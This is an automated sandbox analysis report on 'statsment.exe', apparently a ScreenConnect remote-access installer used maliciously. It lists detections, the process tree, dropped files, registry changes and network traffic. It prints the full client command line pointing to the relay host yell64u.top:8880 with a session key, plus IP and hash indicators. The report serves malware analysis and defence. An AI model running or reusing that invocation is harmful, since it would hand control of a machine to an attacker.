Windows Analysis Report
statsment.exe

Overview

General Information

Sample name: statsment.exe
Analysis ID: 1574188
MD5: 321132051c3add66f0cdae4b8cf4c332
SHA1: 8513ae78b78f157fdd8800f2eda654c75332cd4b
SHA256: d19dbc6b0c0792df8f420c14ef25130052a81d481d38340a40194862ff0095cd
Tags: exe, user-malwarology

Detection

ScreenConnect Tool
Score: 48
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Compliance

Score: 32
Range: 0 - 100

Signatures

Multi AV Scanner detection for submitted file
.NET source code contains potential unpacker
.NET source code references suspicious native API functions
AI detected suspicious sample
Contains functionality to hide user accounts
Creates files in the system32 config directory
Detected potential unwanted application
Enables network access during safeboot for specific services
Modifies security policies related information
Possible COM Object hijacking
Reads the Security eventlog
Reads the System eventlog
Sigma detected: Remote Access Tool - ScreenConnect Suspicious Execution
Allocates memory with a write watch (potentially for evading sandboxes)
Checks for available system drives (often done to infect USB drives)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Creates or modifies windows services
Deletes files inside the Windows folder
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Drops PE files to the windows directory (C:\Windows)
EXE planting / hijacking vulnerabilities found
Enables debug privileges
Found dropped PE file which has not been started or loaded
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
May use bcdedit to modify the Windows boot settings
Modifies existing windows services
PE file contains an invalid checksum
PE file contains executable resources (Code or Archives)
Queries information about the installed CPU (vendor, model number etc)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara detected ScreenConnect Tool

Classification

  • System is w10x64
  • statsment.exe (PID: 7676 cmdline: "C:\Users\user\Desktop\statsment.exe" MD5: 321132051C3ADD66F0CDAE4B8CF4C332)
    • msiexec.exe (PID: 7736 cmdline: "C:\Windows\System32\msiexec.exe" /i "C:\Users\user\AppData\Local\Temp\ScreenConnect\de5851ad6e374ce3\setup.msi" MD5: 9D09DC1EDA745A5F87553048E57620CF)
  • msiexec.exe (PID: 7768 cmdline: C:\Windows\system32\msiexec.exe /V MD5: E5DA170027542E25EDE42FC54C929077)
    • msiexec.exe (PID: 7824 cmdline: C:\Windows\syswow64\MsiExec.exe -Embedding 8184DE85A5CB7E60E4BEE8460840EE70 C MD5: 9D09DC1EDA745A5F87553048E57620CF)
      • rundll32.exe (PID: 7872 cmdline: rundll32.exe "C:\Users\user\AppData\Local\Temp\MSICAFF.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_5884812 1 ScreenConnect.InstallerActions!ScreenConnect.ClientInstallerActions.FixupServiceArguments MD5: 889B99C52A60DD49227C5E485A016679)
    • msiexec.exe (PID: 7960 cmdline: C:\Windows\syswow64\MsiExec.exe -Embedding DF919848E655E7C7ACF0240BA4C9A705 MD5: 9D09DC1EDA745A5F87553048E57620CF)
    • msiexec.exe (PID: 8004 cmdline: C:\Windows\syswow64\MsiExec.exe -Embedding 6E13845DE42F2DC1013E1DB414C7336A E Global\MSI0000 MD5: 9D09DC1EDA745A5F87553048E57620CF)
  • ScreenConnect.ClientService.exe (PID: 8044 cmdline: "C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exe" "?e=Access&y=Guest&h=yell64u.top&p=8880&s=882825b1-a7d4-4898-8af4-0ecb567917da&k=BgIAAACkAABSU0ExAAgAAAEAAQDFK%2fbbpI2Y%2fu64InmNUalvSiNHiKj3qIxef2EBlhKtkMB9Wafgho8PWjl0LvYg9kGVGB%2fBBr7p8upYBqQwJmt2zG9vyAgxlCJY%2fd8W0%2b7tfbGG8gffcJoob3TupNzbeTnvs8%2bYbOTMzzSmg6IjYNBlXj1GtcaHumWR1u8JKfXSyvPzRXOHBR31dMIBtzi1NUnrYf8XA6QXSktBM1h0AQGBZR6FzuZymqeKrjktwq2%2fXUP3dLZ4EN6BZ1k0oNlkviz5vhj3h597IjpGkjLbhfTFC4T%2btt%2bNCv6zQw83IWwtZXibTXf7nMUVQ0n4fF2lKmh5FLU07mqW%2fY38%2b5MO41XA&c=Groups&c=&c=&c=&c=&c=&c=&c=" MD5: 361BCC2CB78C75DD6F583AF81834E447)
    • ScreenConnect.WindowsClient.exe (PID: 8112 cmdline: "C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exe" "RunRole" "0cb4bca7-7067-4861-8f9f-7ae40c9c0413" "User" MD5: 20AB8141D958A58AADE5E78671A719BF)
    • ScreenConnect.WindowsClient.exe (PID: 7344 cmdline: "C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exe" "RunRole" "b789ee53-da8d-4b10-9490-36f6b234bd89" "System" MD5: 20AB8141D958A58AADE5E78671A719BF)
  • cleanup
No configs have been found
Source | Rule | Description | Author | Strings
statsment.exe | JoeSecurity_ScreenConnectTool | Yara detected ScreenConnect Tool | Joe Security |

Source | Rule | Description | Author | Strings
C:\Config.Msi\59d159.rbs | JoeSecurity_ScreenConnectTool | Yara detected ScreenConnect Tool | Joe Security |
C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exe | JoeSecurity_ScreenConnectTool | Yara detected ScreenConnect Tool | Joe Security |
C:\Windows\Installer\MSID418.tmp | JoeSecurity_ScreenConnectTool | Yara detected ScreenConnect Tool | Joe Security |

Source | Rule | Description | Author | Strings
00000000.00000002.1716747544.0000000005430000.00000004.08000000.00040000.00000000.sdmp | JoeSecurity_ScreenConnectTool | Yara detected ScreenConnect Tool | Joe Security |
00000008.00000000.1750694903.0000000000AD2000.00000002.00000001.01000000.00000011.sdmp | JoeSecurity_ScreenConnectTool | Yara detected ScreenConnect Tool | Joe Security |
00000008.00000002.2960693212.0000000002DD1000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_ScreenConnectTool | Yara detected ScreenConnect Tool | Joe Security |
00000000.00000000.1684869140.0000000000256000.00000002.00000001.01000000.00000003.sdmp | JoeSecurity_ScreenConnectTool | Yara detected ScreenConnect Tool | Joe Security |
00000009.00000002.1800818795.00000000029B1000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_ScreenConnectTool | Yara detected ScreenConnect Tool | Joe Security |

Source | Rule | Description | Author | Strings
0.2.statsment.exe.5430000.9.raw.unpack | JoeSecurity_ScreenConnectTool | Yara detected ScreenConnect Tool | Joe Security |
8.0.ScreenConnect.WindowsClient.exe.ad0000.0.unpack | JoeSecurity_ScreenConnectTool | Yara detected ScreenConnect Tool | Joe Security |
8.2.ScreenConnect.WindowsClient.exe.2e4fa20.0.raw.unpack | JoeSecurity_ScreenConnectTool | Yara detected ScreenConnect Tool | Joe Security |
0.2.statsment.exe.5430000.9.unpack | JoeSecurity_ScreenConnectTool | Yara detected ScreenConnect Tool | Joe Security |
0.0.statsment.exe.305db8.5.raw.unpack | JoeSecurity_ScreenConnectTool | Yara detected ScreenConnect Tool | Joe Security |

                              System Summary

                              Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exe" "?e=Access&y=Guest&h=yell64u.top&p=8880&s=882825b1-a7d4-4898-8af4-0ecb567917da&k=BgIAAACkAABSU0ExAAgAAAEAAQDFK%2fbbpI2Y%2fu64InmNUalvSiNHiKj3qIxef2EBlhKtkMB9Wafgho8PWjl0LvYg9kGVGB%2fBBr7p8upYBqQwJmt2zG9vyAgxlCJY%2fd8W0%2b7tfbGG8gffcJoob3TupNzbeTnvs8%2bYbOTMzzSmg6IjYNBlXj1GtcaHumWR1u8JKfXSyvPzRXOHBR31dMIBtzi1NUnrYf8XA6QXSktBM1h0AQGBZR6FzuZymqeKrjktwq2%2fXUP3dLZ4EN6BZ1k0oNlkviz5vhj3h597IjpGkjLbhfTFC4T%2btt%2bNCv6zQw83IWwtZXibTXf7nMUVQ0n4fF2lKmh5FLU07mqW%2fY38%2b5MO41XA&c=Groups&c=&c=&c=&c=&c=&c=&c=", CommandLine: "C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exe" "?e=Access&y=Guest&h=yell64u.top&p=8880&s=882825b1-a7d4-4898-8af4-0ecb567917da&k=BgIAAACkAABSU0ExAAgAAAEAAQDFK%2fbbpI2Y%2fu64InmNUalvSiNHiKj3qIxef2EBlhKtkMB9Wafgho8PWjl0LvYg9kGVGB%2fBBr7p8upYBqQwJmt2zG9vyAgxlCJY%2fd8W0%2b7tfbGG8gffcJoob3TupNzbeTnvs8%2bYbOTMzzSmg6IjYNBlXj1GtcaHumWR1u8JKfXSyvPzRXOHBR31dMIBtzi1NUnrYf8XA6QXSktBM1h0AQGBZR6FzuZymqeKrjktwq2%2fXUP3dLZ4EN6BZ1k0oNlkviz5vhj3h597IjpGkjLbhfTFC4T%2btt%2bNCv6zQw83IWwtZXibTXf7nMUVQ0n4fF2lKmh5FLU07mqW%2fY38%2b5MO41XA&c=Groups&c=&c=&c=&c=&c=&c=&c=", CommandLine|base64offset|contains: )^, Image: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exe, NewProcessName: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exe, OriginalFileName: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 620, ProcessCommandLine: "C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exe" 
"?e=Access&y=Guest&h=yell64u.top&p=8880&s=882825b1-a7d4-4898-8af4-0ecb567917da&k=BgIAAACkAABSU0ExAAgAAAEAAQDFK%2fbbpI2Y%2fu64InmNUalvSiNHiKj3qIxef2EBlhKtkMB9Wafgho8PWjl0LvYg9kGVGB%2fBBr7p8upYBqQwJmt2zG9vyAgxlCJY%2fd8W0%2b7tfbGG8gffcJoob3TupNzbeTnvs8%2bYbOTMzzSmg6IjYNBlXj1GtcaHumWR1u8JKfXSyvPzRXOHBR31dMIBtzi1NUnrYf8XA6QXSktBM1h0AQGBZR6FzuZymqeKrjktwq2%2fXUP3dLZ4EN6BZ1k0oNlkviz5vhj3h597IjpGkjLbhfTFC4T%2btt%2bNCv6zQw83IWwtZXibTXf7nMUVQ0n4fF2lKmh5FLU07mqW%2fY38%2b5MO41XA&c=Groups&c=&c=&c=&c=&c=&c=&c=", ProcessId: 8044, ProcessName: ScreenConnect.ClientService.exe
                              Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: ScreenConnect Client (de5851ad6e374ce3) Credential Provider, EventID: 13, EventType: SetValue, Image: C:\Windows\System32\msiexec.exe, ProcessId: 7768, TargetObject: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Authentication\Credential Providers\{6FF59A85-BC37-4CD4-406F-012C01771397}\(Default)
                              No Suricata rule has matched

                              AV Detection

                              Source: statsment.exe Virustotal: Detection: 27%
                              Source: Submitted Sample Integrated Neural Analysis Model: Matched 96.4% probability
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeCode function: 7_2_05E3238C CryptUnprotectData,7_2_05E3238C
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeCode function: 7_2_05E33090 CryptUnprotectData,7_2_05E33090
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeCode function: 7_2_05E32381 CryptUnprotectData,7_2_05E32381
                              Source: C:\Users\user\Desktop\statsment.exe EXE: msiexec.exe

                              Compliance

                              Source: C:\Users\user\Desktop\statsment.exe EXE: msiexec.exe
                              Source: statsment.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                              Source: statsment.exeStatic PE information: certificate valid
                              Source: statsment.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                              Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsFileManager\obj\Release\ScreenConnect.WindowsFileManager.pdb source: ScreenConnect.WindowsFileManager.exe.2.dr
                              Source: Binary string: C:\builds\cc\cwcontrol\Product\Client\obj\Release\net20\ScreenConnect.Client.pdbU source: ScreenConnect.WindowsClient.exe, 00000009.00000002.1800218689.0000000000F22000.00000002.00000001.01000000.00000010.sdmp, ScreenConnect.Client.dll.2.dr
                              Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsClient\obj\Release\ScreenConnect.WindowsClient.pdbe source: ScreenConnect.WindowsClient.exe, 00000008.00000000.1750694903.0000000000AD2000.00000002.00000001.01000000.00000011.sdmp, ScreenConnect.WindowsClient.exe.2.dr
                              Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsInstaller\obj\Release\net20\ScreenConnect.WindowsInstaller.pdbM source: statsment.exe
                              Source: Binary string: C:\builds\cc\cwcontrol\Product\ClientInstallerRunner\obj\Release\ScreenConnect.ClientInstallerRunner.pdb source: statsment.exe
                              Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsInstaller\obj\Release\net20\ScreenConnect.WindowsInstaller.pdb source: statsment.exe
                              Source: Binary string: C:\build\work\eca3d12b\wix3\build\obj\ship\x86\WindowsInstaller\Microsoft.Deployment.WindowsInstaller.pdbT source: Microsoft.Deployment.WindowsInstaller.dll.4.dr
                              Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsBackstageShell\obj\Release\ScreenConnect.WindowsBackstageShell.pdb source: ScreenConnect.WindowsBackstageShell.exe.2.dr
                              Source: Binary string: C:\build\work\eca3d12b\wix3\build\obj\ship\x86\WindowsInstaller.Package\Microsoft.Deployment.WindowsInstaller.Package.pdb source: Microsoft.Deployment.WindowsInstaller.Package.dll.4.dr
                              Source: Binary string: C:\Compile\screenconnect\Product\WindowsAuthenticationPackage\bin\Release\ScreenConnect.WindowsAuthenticationPackage.pdb source: ScreenConnect.ClientService.exe, 00000007.00000002.2983468766.0000000002B77000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000009.00000002.1806553609.00000000129C0000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsAuthenticationPackage.dll.2.dr
                              Source: Binary string: C:\builds\cc\cwcontrol\Product\Core\obj\Release\net20\ScreenConnect.Core.pdb source: statsment.exe, ScreenConnect.Core.dll.4.dr, ScreenConnect.Core.dll.2.dr
                              Source: Binary string: C:\builds\cc\cwcontrol\Product\ClientService\obj\Release\ScreenConnect.ClientService.pdb source: ScreenConnect.WindowsClient.exe, 00000008.00000002.2960693212.0000000002DD1000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000009.00000002.1800566476.0000000002942000.00000002.00000001.01000000.0000000D.sdmp, ScreenConnect.WindowsClient.exe, 00000009.00000002.1800109630.0000000000EE0000.00000004.08000000.00040000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000009.00000002.1800818795.00000000029B1000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.ClientService.dll.2.dr
                              Source: Binary string: C:\Users\jmorgan\Source\cwcontrol\Custom\DotNetRunner\DotNetResolver\obj\Debug\DotNetResolver.pdb source: statsment.exe
                              Source: Binary string: C:\Users\jmorgan\Source\cwcontrol\Custom\DotNetRunner\Release\DotNetServiceRunner.pdb source: ScreenConnect.ClientService.exe, 00000007.00000000.1735043722.000000000041D000.00000002.00000001.01000000.0000000C.sdmp, ScreenConnect.ClientService.exe.2.dr
                              Source: Binary string: C:\builds\cc\cwcontrol\Product\Windows\obj\Release\net20\ScreenConnect.Windows.pdb source: statsment.exe, ScreenConnect.Windows.dll.2.dr, ScreenConnect.Windows.dll.4.dr
                              Source: Binary string: C:\build\work\eca3d12b\wix3\build\obj\ship\x86\Compression.Cab\Microsoft.Deployment.Compression.Cab.pdb source: rundll32.exe, 00000004.00000003.1711832278.0000000004C2A000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1714393742.00000000049B0000.00000004.00000020.00020000.00000000.sdmp, Microsoft.Deployment.Compression.Cab.dll.4.dr
                              Source: Binary string: C:\build\work\eca3d12b\wix3\build\obj\ship\x86\WindowsInstaller\Microsoft.Deployment.WindowsInstaller.pdb source: Microsoft.Deployment.WindowsInstaller.dll.4.dr
                              Source: Binary string: C:\build\work\eca3d12b\wix3\build\obj\ship\x86\Compression\Microsoft.Deployment.Compression.pdb source: rundll32.exe, 00000004.00000003.1711832278.0000000004BBB000.00000004.00000020.00020000.00000000.sdmp, Microsoft.Deployment.Compression.dll.4.dr
                              Source: Binary string: C:\build\work\eca3d12b\wix3\build\ship\x86\wixca.pdb source: statsment.exe, 59d159.rbs.2.dr, 59d15a.msi.2.dr, MSID438.tmp.2.dr, 59d158.msi.2.dr, MSID418.tmp.2.dr, MSID756.tmp.2.dr, setup.msi.0.dr
                              Source: Binary string: screenconnect_windows_credential_provider.pdb source: ScreenConnect.ClientService.exe, 00000007.00000002.2983468766.0000000002B77000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000009.00000002.1806553609.00000000129C0000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsCredentialProvider.dll.2.dr
                              Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsClient\obj\Release\ScreenConnect.WindowsClient.pdb source: ScreenConnect.WindowsClient.exe, 00000008.00000000.1750694903.0000000000AD2000.00000002.00000001.01000000.00000011.sdmp, ScreenConnect.WindowsClient.exe.2.dr
                              Source: Binary string: C:\builds\cc\cwcontrol\Product\InstallerActions\obj\Release\ScreenConnect.InstallerActions.pdb source: ScreenConnect.InstallerActions.dll.4.dr
                              Source: Binary string: E:\delivery\Dev\wix37_public\build\ship\x86\SfxCA.pdb source: statsment.exe, 59d15a.msi.2.dr, 59d158.msi.2.dr, MSICAFF.tmp.1.dr, setup.msi.0.dr
                              Source: Binary string: C:\builds\cc\cwcontrol\Product\Windows\obj\Release\net20\ScreenConnect.Windows.pdbW] source: statsment.exe, ScreenConnect.Windows.dll.2.dr, ScreenConnect.Windows.dll.4.dr
                              Source: Binary string: C:\builds\cc\cwcontrol\Product\Client\obj\Release\net20\ScreenConnect.Client.pdb source: ScreenConnect.WindowsClient.exe, 00000009.00000002.1800218689.0000000000F22000.00000002.00000001.01000000.00000010.sdmp, ScreenConnect.Client.dll.2.dr
                              Source: Binary string: screenconnect_windows_credential_provider.pdb' source: ScreenConnect.ClientService.exe, 00000007.00000002.2983468766.0000000002B77000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000009.00000002.1806553609.00000000129C0000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsCredentialProvider.dll.2.dr
                              Source: Binary string: C:\Users\jmorgan\Source\cwcontrol\Custom\DotNetRunner\Release\DotNetRunner.pdb source: statsment.exe
                              Source: C:\Windows\System32\msiexec.exe File opened: z:, x:, v:, t:, r:, p:, n:, l:, j:, h:, f:, b:, y:, w:, u:, s:, q:, o:, m:, k:, i:, g:, e:, c:, a:

                              Networking

                              Source: C:\Windows\System32\msiexec.exe Registry value created: NULL Service
                              Source: global trafficTCP traffic: 192.168.2.4:49731 -> 85.239.34.190:8880
                              Source: Joe Sandbox ViewASN Name: RAINBOW-HKRainbownetworklimitedHK RAINBOW-HKRainbownetworklimitedHK
                              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                              Source: global trafficDNS traffic detected: DNS query: yell64u.top
                              Source: statsment.exe, ScreenConnect.WindowsBackstageShell.exe.2.dr, ScreenConnect.ClientService.exe.2.dr, ScreenConnect.WindowsFileManager.exe.2.dr, ScreenConnect.WindowsAuthenticationPackage.dll.2.dr, ScreenConnect.WindowsClient.exe.2.dr, ScreenConnect.WindowsCredentialProvider.dll.2.drString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
                              Source: ScreenConnect.WindowsClient.exe, 00000009.00000002.1806553609.00000000129C0000.00000004.00000800.00020000.00000000.sdmp, statsment.exe, ScreenConnect.WindowsBackstageShell.exe.2.dr, ScreenConnect.ClientService.exe.2.dr, ScreenConnect.WindowsFileManager.exe.2.dr, ScreenConnect.WindowsAuthenticationPackage.dll.2.dr, ScreenConnect.WindowsClient.exe.2.dr, ScreenConnect.WindowsCredentialProvider.dll.2.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
                              Source: statsment.exe, ScreenConnect.WindowsBackstageShell.exe.2.dr, ScreenConnect.ClientService.exe.2.dr, ScreenConnect.WindowsFileManager.exe.2.dr, ScreenConnect.WindowsAuthenticationPackage.dll.2.dr, ScreenConnect.WindowsClient.exe.2.dr, ScreenConnect.WindowsCredentialProvider.dll.2.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
                              Source: statsment.exe, ScreenConnect.WindowsBackstageShell.exe.2.dr, ScreenConnect.ClientService.exe.2.dr, ScreenConnect.WindowsFileManager.exe.2.dr, ScreenConnect.WindowsAuthenticationPackage.dll.2.dr, ScreenConnect.WindowsClient.exe.2.dr, ScreenConnect.WindowsCredentialProvider.dll.2.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
                              Source: statsment.exe, ScreenConnect.WindowsBackstageShell.exe.2.dr, ScreenConnect.ClientService.exe.2.dr, ScreenConnect.WindowsFileManager.exe.2.dr, ScreenConnect.WindowsAuthenticationPackage.dll.2.dr, ScreenConnect.WindowsClient.exe.2.dr, ScreenConnect.WindowsCredentialProvider.dll.2.drString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
                              Source: statsment.exe, ScreenConnect.WindowsBackstageShell.exe.2.dr, ScreenConnect.ClientService.exe.2.dr, ScreenConnect.WindowsFileManager.exe.2.dr, ScreenConnect.WindowsAuthenticationPackage.dll.2.dr, ScreenConnect.WindowsClient.exe.2.dr, ScreenConnect.WindowsCredentialProvider.dll.2.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
                              Source: statsment.exe, ScreenConnect.WindowsBackstageShell.exe.2.dr, ScreenConnect.ClientService.exe.2.dr, ScreenConnect.WindowsFileManager.exe.2.dr, ScreenConnect.WindowsAuthenticationPackage.dll.2.dr, ScreenConnect.WindowsClient.exe.2.dr, ScreenConnect.WindowsCredentialProvider.dll.2.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
                              Source: ScreenConnect.WindowsCredentialProvider.dll.2.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
                              Source: ScreenConnect.WindowsClient.exe, 00000009.00000002.1806553609.00000000129C0000.00000004.00000800.00020000.00000000.sdmp, statsment.exe, ScreenConnect.WindowsBackstageShell.exe.2.dr, ScreenConnect.ClientService.exe.2.dr, ScreenConnect.WindowsFileManager.exe.2.dr, ScreenConnect.WindowsAuthenticationPackage.dll.2.dr, ScreenConnect.WindowsClient.exe.2.dr, ScreenConnect.WindowsCredentialProvider.dll.2.drString found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0
                              Source: statsment.exe, ScreenConnect.WindowsBackstageShell.exe.2.dr, ScreenConnect.ClientService.exe.2.dr, ScreenConnect.WindowsFileManager.exe.2.dr, ScreenConnect.WindowsAuthenticationPackage.dll.2.dr, ScreenConnect.WindowsClient.exe.2.dr, ScreenConnect.WindowsCredentialProvider.dll.2.drString found in binary or memory: http://ocsp.digicert.com0
                              Source: statsment.exe, ScreenConnect.WindowsBackstageShell.exe.2.dr, ScreenConnect.ClientService.exe.2.dr, ScreenConnect.WindowsFileManager.exe.2.dr, ScreenConnect.WindowsAuthenticationPackage.dll.2.dr, ScreenConnect.WindowsClient.exe.2.dr, ScreenConnect.WindowsCredentialProvider.dll.2.drString found in binary or memory: http://ocsp.digicert.com0A
                              Source: statsment.exe, ScreenConnect.WindowsBackstageShell.exe.2.dr, ScreenConnect.ClientService.exe.2.dr, ScreenConnect.WindowsFileManager.exe.2.dr, ScreenConnect.WindowsAuthenticationPackage.dll.2.dr, ScreenConnect.WindowsClient.exe.2.dr, ScreenConnect.WindowsCredentialProvider.dll.2.drString found in binary or memory: http://ocsp.digicert.com0C
                              Source: statsment.exe, ScreenConnect.WindowsBackstageShell.exe.2.dr, ScreenConnect.ClientService.exe.2.dr, ScreenConnect.WindowsFileManager.exe.2.dr, ScreenConnect.WindowsAuthenticationPackage.dll.2.dr, ScreenConnect.WindowsClient.exe.2.dr, ScreenConnect.WindowsCredentialProvider.dll.2.drString found in binary or memory: http://ocsp.digicert.com0X
                              Source: ScreenConnect.ClientService.exe, 00000007.00000002.2963863424.0000000001D5A000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000009.00000002.1800818795.00000000029B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                              Source: rundll32.exe, 00000004.00000003.1711832278.0000000004BBB000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1712025636.00000000049B3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1711832278.0000000004C2A000.00000004.00000020.00020000.00000000.sdmp, Microsoft.Deployment.WindowsInstaller.dll.4.dr, Microsoft.Deployment.WindowsInstaller.Package.dll.4.dr, Microsoft.Deployment.Compression.dll.4.dr, Microsoft.Deployment.Compression.Cab.dll.4.drString found in binary or memory: http://wixtoolset.org/Whttp://wixtoolset.org/telemetry/v
                              Source: rundll32.exe, 00000004.00000003.1711832278.0000000004BBB000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1712025636.00000000049B3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1711832278.0000000004C2A000.00000004.00000020.00020000.00000000.sdmp, Microsoft.Deployment.WindowsInstaller.dll.4.dr, Microsoft.Deployment.WindowsInstaller.Package.dll.4.dr, Microsoft.Deployment.Compression.dll.4.dr, Microsoft.Deployment.Compression.Cab.dll.4.drString found in binary or memory: http://wixtoolset.org/news/
                              Source: rundll32.exe, 00000004.00000003.1711832278.0000000004BBB000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1712025636.00000000049B3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1711832278.0000000004C2A000.00000004.00000020.00020000.00000000.sdmp, Microsoft.Deployment.WindowsInstaller.dll.4.dr, Microsoft.Deployment.WindowsInstaller.Package.dll.4.dr, Microsoft.Deployment.Compression.dll.4.dr, Microsoft.Deployment.Compression.Cab.dll.4.drString found in binary or memory: http://wixtoolset.org/releases/
                              Source: statsment.exe, ScreenConnect.WindowsBackstageShell.exe.2.dr, ScreenConnect.ClientService.exe.2.dr, ScreenConnect.WindowsFileManager.exe.2.dr, ScreenConnect.WindowsAuthenticationPackage.dll.2.dr, ScreenConnect.WindowsClient.exe.2.dr, ScreenConnect.WindowsCredentialProvider.dll.2.drString found in binary or memory: http://www.digicert.com/CPS0
                              Source: ScreenConnect.WindowsCredentialProvider.dll.2.drString found in binary or memory: https://docs.rs/getrandom#nodejs-es-module-support
                              Source: ScreenConnect.Core.dll.2.drString found in binary or memory: https://feedback.screenconnect.com/Feedback.axd

                              Spam, unwanted Advertisements and Ransom Demands

                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exe Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exe Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security\ScreenConnect
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exe Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System

System Summary

Source: statsment.exe PE Signature Subject Chain: CN="Connectwise, LLC", O="Connectwise, LLC", L=Tampa, S=Florida, C=US
Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\59d158.msi
Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\inprogressinstallinfo.ipi
Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\SourceHash{98F14B4D-F652-F7B9-4AEF-F8F43E2034FC}
Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\MSID418.tmp
Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\MSID438.tmp
Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\MSID756.tmp
Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\59d15a.msi
